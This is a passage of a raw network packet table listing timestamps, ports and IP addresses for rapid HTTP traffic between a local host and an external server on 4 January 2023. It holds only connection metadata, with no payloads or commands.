Jan 4, 2023 16:47:24.093640089 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.093650103 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.093662977 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.093669891 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.093684912 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.093684912 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.093708038 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.093717098 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.093730927 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.093744993 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.093753099 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.093769073 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.093776941 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.093784094 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.093800068 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.093806028 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.093822002 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.093827009 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.093843937 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.093893051 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.093926907 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.093954086 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.093981028 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.093981981 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.094007015 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.094017982 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.094029903 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.094057083 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.094084978 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.094111919 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.094130993 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.094130993 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.094130993 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.094142914 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.094150066 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.094158888 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.094191074 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.094218016 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.094239950 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.094264984 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.094269037 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.094281912 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.094309092 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.094347954 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.094369888 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.094393969 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.094397068 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.094413042 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.094424009 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.094444990 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.094449997 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.094465971 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.094476938 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.094491959 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.094502926 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.094518900 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.094528913 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.094552040 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.094558954 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.094593048 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.094608068 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.094716072 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.094737053 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.094774008 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.094790936 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.094881058 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.094901085 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.094926119 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.094928980 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.094952106 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.094952106 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.094969988 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.094978094 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.094995975 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.095004082 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.095030069 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.095031023 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.095057011 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.095057964 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.095069885 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.095082045 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.095099926 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.095107079 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.095125914 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.095134020 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.095158100 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.095161915 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.095181942 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.095184088 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.095196962 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.095208883 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.095227003 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.095233917 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.095258951 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.095258951 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.095274925 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.095283985 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.095302105 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.095308065 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.095323086 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.095334053 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.095354080 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.095359087 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.095377922 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.095386028 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.095402956 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.095413923 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.095433950 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.095439911 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.095459938 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.095467091 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.095482111 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.095493078 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.095510006 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.095518112 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.095535994 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.095561028 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.095566988 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.095587969 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.095609903 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.095613956 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.095630884 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.095643997 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.095671892 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.095674038 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.095686913 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.095699072 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.095721006 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.095726013 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.095752954 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.095777035 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.095781088 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.095810890 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.095828056 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.095837116 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.095856905 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.095886946 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.095889091 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.095917940 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.095937967 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.095967054 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.095968008 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.095989943 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.096014977 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.096019030 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.096043110 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.096043110 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.096081972 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.096095085 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.096096039 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.096117973 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.096137047 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.096143961 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.096175909 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.096199989 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.096221924 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.096250057 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.096271038 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.096277952 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.096292019 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.096302032 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.096327066 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.096327066 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.096345901 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.096353054 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.096369982 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.096396923 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.120688915 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.120803118 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.121062994 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.121095896 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.121125937 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.121139050 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.121154070 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.121164083 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.121196985 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.121231079 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.121241093 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.121294975 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.121298075 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.121314049 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.121315956 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.121329069 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.121350050 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.121366024 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.121370077 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.121393919 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.121412992 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.121414900 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.121428013 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.121459961 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.121460915 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.121476889 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.121493101 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.121509075 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.121524096 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.121546030 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.121558905 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.121572971 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.121598005 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.121608019 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.121633053 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.121648073 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.121649981 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.121665001 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.121679068 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.121696949 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.121699095 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.121717930 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.121730089 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.121748924 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.121761084 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.121781111 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.121793032 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.121820927 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.121825933 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.121853113 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.121855974 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.121867895 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.121903896 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.122885942 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.122914076 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.122942924 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.122956038 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.122981071 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.123491049 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.123528004 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.123534918 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.123568058 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.123572111 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.123598099 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.123603106 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.123613119 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.123634100 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.123648882 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.123671055 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.123706102 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.123740911 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.123745918 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.123754978 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.123779058 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.123817921 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.123820066 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.123850107 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.123856068 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.123872995 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.123888016 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.123903990 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.123919964 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.123934031 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.123950005 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.123967886 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.123980999 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.123996019 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.124022007 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.124028921 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.124033928 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.124063015 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.124067068 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.124092102 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.124095917 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.124106884 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.124129057 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.124152899 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.124160051 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.124172926 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.124188900 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.124205112 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.124228001 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.124232054 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.124258041 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.124274969 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.124289989 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.124317884 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.124329090 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.124349117 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.124351978 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.124363899 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.124382019 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.124396086 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.124432087 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.124711990 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.124738932 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.124769926 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.124789953 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.124828100 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.124828100 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.124850035 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.124877930 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.124888897 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.124926090 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.124948978 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.124975920 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.124991894 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.125037909 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.125037909 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.125086069 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.125097990 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.125138044 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.125140905 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.125188112 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.125200033 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.125219107 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.125253916 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.125267982 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.125287056 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.125329018 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.125339031 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.125380039 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.125392914 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.125446081 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.125453949 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.125483990 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.125499010 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.125523090 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.125534058 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.125561953 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.125572920 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.125600100 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.125611067 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.125638962 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.125648022 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.125679016 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.125685930 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.125719070 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.125726938 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.125760078 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.125768900 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.125797987 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.125813961 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.125838041 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.125849009 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.125878096 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.125890970 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.125916958 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.125926018 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.125957966 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.125967026 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:24.125996113 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:24.126012087 CET	49695	80	192.168.2.4	109.107.173.210
